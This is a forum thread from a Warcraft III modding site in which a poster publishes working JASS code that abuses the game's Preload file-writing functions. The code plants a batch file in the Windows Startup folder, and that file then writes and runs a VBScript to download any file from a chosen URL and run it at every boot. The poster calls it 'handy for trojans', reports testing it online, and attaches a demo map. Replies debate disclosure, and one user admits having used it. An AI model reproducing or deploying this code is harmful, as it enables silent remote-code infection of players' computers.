How to virus in Warcraft III

Jesus4Lyf

Jesus4Lyf

Good Idea™
Reaction score
397
Made a post about it here, but hey...
JASS:
function Infest takes string url, string localname returns nothing
    call PreloadGenClear()
    call PreloadGenStart()
    call Preload("\")\necho Set objXMLHTTP = CreateObject(\"MSXML2.XMLHTTP\") > %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objXMLHTTP.open \"GET\", \""+url+"\", false >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objXMLHTTP.send() >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho If objXMLHTTP.Status = 200 Then >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho Set objADOStream = CreateObject(\"ADODB.Stream\") >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objADOStream.Open >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objADOStream.Type = 1 >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objADOStream.Write objXMLHTTP.ResponseBody >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objADOStream.Position = 0 >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho Set objFSO = Createobject(\"Scripting.FileSystemObject\") >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho If objFSO.Fileexists(\"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\"+localname+"\") Then objFSO.DeleteFile \"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\"+localname+"\" >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objADOStream.SaveToFile \"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\"+localname+"\" >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objADOStream.Close >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho End if >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objFSO.DeleteFile \"%TEMP%\\download.vbs\" >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objFSO.DeleteFile \"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\myvirus.bat\" >> %TEMP%\\download.vbs\n//")
    call Preload("\")\nstart %TEMP%\\download.vbs\n//")
    call PreloadGenEnd("C:\\Users\\YOURUSERNAMEHERE\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\myvirus.bat")
    call PreloadGenClear()
    call PreloadGenStart()
    call Preload("\")\necho Set objXMLHTTP = CreateObject(\"MSXML2.XMLHTTP\") > %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objXMLHTTP.open \"GET\", \""+url+"\", false >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objXMLHTTP.send() >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho If objXMLHTTP.Status = 200 Then >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho Set objADOStream = CreateObject(\"ADODB.Stream\") >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objADOStream.Open >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objADOStream.Type = 1 >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objADOStream.Write objXMLHTTP.ResponseBody >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objADOStream.Position = 0 >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho Set objFSO = Createobject(\"Scripting.FileSystemObject\") >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho If objFSO.Fileexists(\"C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\"+localname+"\") Then objFSO.DeleteFile \"C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\"+localname+"\" >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objADOStream.SaveToFile \"C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\"+localname+"\" >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objADOStream.Close >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho End if >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objFSO.DeleteFile \"%TEMP%\\download.vbs\" >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objFSO.DeleteFile \"C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\myvirus.bat\" >> %TEMP%\\download.vbs\n//")
    call Preload("\")\nstart %TEMP%\\download.vbs\n//")
    call PreloadGenEnd("C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\myvirus.bat")
endfunction

//===========================================================================
function InitTrig_Melee_Initialization takes nothing returns nothing
    call Infest("http://www.stephan-brenner.com/blog/wp-content/uploads/2008/08/donothing.zip", "myvirus.zip")
endfunction

This function is cool. For Windows 7, you must replace YOURUSERNAMEHERE with the username on the computer, but on XP this should be unnecessary (and so XP is particularly vulnerable). Just call the function from WC3. When you next restart your computer, the url you specify will be downloaded to your startup folder as the name you specify, and called (the reason you specify the local filename is so Windows knows what file type to run it as).

If someone could test this online with a friend who has Windows XP and finds it to work, we can successfully say Blizzard needs to patch again. I mean, I'm sure the Russians will love it. :)

In case someone doesn't understand what this does, calling the function from any map will run the file specified on every player's pc on every boot from then onwards. Very handy for trojans and the like. :thup:

Let me know if this works on XP! I can't test it right now... :p

Edit: To remove infections, go to Start > Programs > Startup and delete the filename you used as "localname", or "myvirus.bat", depending which is visible.
Edit: Tested on Windows XP, works online, serious threat.
 
>So this is what you were up to all these months
Something like that.
Actually, I've just not been around, but when this came up, I figured I'd drop you guys a note. ;)

Tested on Windows XP. Works 100%.

I should clarify - it's the second boot after you play the map, not the first. Here is a demo map. :)

Do not play any WC3 maps until the next patch.

This map will put an image of the word CYPHIX in your startup. Nothing dangerous. :)
To remove, go to Start > Programs > Startup and delete cyphix.jpg.
Works on map initialisation, works on battle.net.
AKA. This is a real tried and proven threat. :thup:
 

Attachments

  • virustest.w3x
    13.7 KB · Views: 776
omg you really are making the world a little worse every now and then. what comes next? you tell us not to breathe because viruses could be in the air?

lol, maybe you should tell blizzard they should hire you for bugfixing and such.

by the way, i would delete the scripts, the wrong people could read this thread. i think the majority of the community will trust in your words, those who dont will most probably still play wc3 maps anyways.
 
Accname said:
omg you really are making the world a little worse every now and then.
Click to expand...
Well, if I don't find and post it, someone else will find it and abuse it. It's a matter of time.

>already reported it to blizzard?
Can't be stuffed, I have assignments to do. -_-
Edit: Done. And I asked if they have QA jobs available. :p

>maybe you should tell blizzard they should hire you for bugfixing and such
They should, considering this is.. the third time..?

>by the way, i would delete the scripts
I'll wait to see what the other moderators think. I love exposing it.. :)
 
Hmm, what happen if I link it to a super large file(Takes ages to download)? Lol.
 
Wow, another exploit? Blizzard's not going to be impressed. :p

> Hmm, what happen if I link it to a super large file(Takes ages to download)? Lol.
It'd download. Eventually. As expected.
 
The download is done in the background. So the user won't see it... but yes, you can do it.
Romek said:
Wow, another exploit? Blizzard's not going to be impressed. :p
Click to expand...
I wasn't very impressed, either. Surely someone considered that allowing file I/O from WC3 was a bad idea... o.o
 
blizzard shoud give as legal way to execute code and store data on HDD (also sync this data online) and it will be fine.

All known bugs (including return bug) was developed for good, not for viruses.

well this can do anything (just like codeexec) (russian developements always evil :( )
 
Hey, at least with this, you can download an executable to set the local files flag in WC3. So you can download 100mb model packs to people's computers which can then be used in WC3 maps! Whilst you're at it, you can modify WC3 executables to add additional natives like RtC, all without the map player ever knowing! In fact, you can format their whole hard disk! I think you're right, Blizzard needs to give us more power!! MOAR!!.

Sorry for the sarcasm, but WC3 being able to do file I/O is just wrong. If you can use it for good, you can use it for evil. :)

Now, trying to find how to report bugs to Blizzard... that might be too difficult, even for me. :p
 
Why does people find all the nice stuff and show it to everybody :p

I was using this after the return bug got deleted out.... :( not again.... must think whats next now.
 
> I was using this after the return bug got deleted out.... not again.... must think whats next now.
This doesn't typecast variables.
 
even real-time antivirus fail to this.. xD
 
this was kept in secret for 2 years, now it does not matter.
warcraft is dead anyway.

no one on english or russian segment of internet using this, asians may be using it, but, its unknown for me. (for ex they used runtime texture changing on units long before this discovered in english segment)

also in some cases warcraft may overwrite existing files (fun with ntldr)
 
You must log in or register to reply here.
General chit-chat
Help Users
  • No one is chatting at the moment.
  • Varine Varine:
    A probate is usually done with a will, yes? If so I am sorry for your loss
     +1
  • The Helper The Helper:
    Yeah Tom, me too sorry for your loss buddy my mom told me she finds out her olds friend died from Google searching them. She had not talked to one of her old friends in a year and found out she died from Google. Also another one in the same session. RIP all of them my sincere condolences Tom
     +1
  • Varine Varine:
    We have some elderly guests that regularly come hang out at the bar at the end of the night, and every once in a while we don't see someone for a few weeks and then someone shows up with their obituary.
  • Varine Varine:
    We usually let them do their memorials there in the morning if they want to and I'll make them some snacks and drinks. There was one guy named Tom that came in like every night and would sit by himself and get a bunch of soup and a glass of wine. idk why but he LOVED our fucking soup, like he would order a fucking quart of it at a time and would always get so sad when we stop doing it for the summer.
     +1
  • Varine Varine:
    But he also loved our calamari, which is another thing I hate but it sells super well so I can't change it. There was one day he came in and was asking me how to make it, because he tried to at home once in the off season when we stop running it and he really wanted it lol
  • Varine Varine:
    I think he's one of the only people I've made recipes for for free because he really wanted a broccoli cheddar, and it was like dude I don't have a recipe, it's just whatever I have, but here, this is how you do it
  • Varine Varine:
    I don't think he ever figured out how to do the calamari in a pan though, like idk how to do that either. He was afraid of the at home deep fryers though and it's like yeah, that's fair, I am too
  • Varine Varine:
    He was just such a sweet old man, we had two servers pregnant and they held a baby shower together, he was soooooo fucking excited to get to see a baby. Unfortunately he died a month or so before they were born
  • The Helper The Helper:
    So I decided to Google some people that I had not seen or heard from in a while and sure enough one of my old best friends, we had a falling out years ago but whatever, find out he died of Pancreatic Cancer in January. I have also lost a few of my closer acquaintances from growing up the last year. Getting old - people die - I kinda thought it was going to be this way a few years ago....
     +2
  • The Helper The Helper:
    Forum running super slow again
  • Ghan Ghan:
    Not really clear from the stats as to what is causing the slowness.
  • Ghan Ghan:
    We get a lot of guest traffic so it may just be the load is getting too high and not from any particular source.
  • Ghan Ghan:
    Looks like the server is maxed out on CPU.
  • Ghan Ghan:
    Oh it looks like a lot of the traffic is Silkroad Forums. That domain isn't protected by Cloudflare.
  • Ghan Ghan:
    But the old Silkroad site is still on its own server. I just had a test site set up on this server for it.
  • Ghan Ghan:
    I just disabled that test site. Let's see if that helps the load.
  • Ghan Ghan:
    Looks much better already.
  • The Helper The Helper:
    I had actually forgot about the Silkroad site. I had asked
  • The Helper The Helper:
    SD Ryoko about it and he said the couple of people left on there really like it, that was a few years ago, maybe I should check back
  • jonas jonas:
    I guess when you're getting old, and the last day of soup season draws near, you start wondering
  • jonas jonas:
    will I make it to the start of the next season? or was this the last time I'll ever have my favorite dish?
  • The Helper The Helper:
    I am doing my first Vibe Coding project. In installed the environment and tools according to instructions but it is all chat doing this for me at my direction. It is fun really and holy shit I might finish in 2 hours what it would have taken a day to in my Access and this would be an electron app complete new
  • Ghan Ghan:
    Good stuff.
  • Ghan Ghan:
    Just make sure it is secure. :)
  • The Helper The Helper:
    It will only be on internal network

      The Helper Discord

      Members online

      No members online now.
      Online now:
      468 (members: 0, guests: 468)

      Share this page

      Affiliates

      Hive Workshop NUON Dome World Editor Tutorials
      Top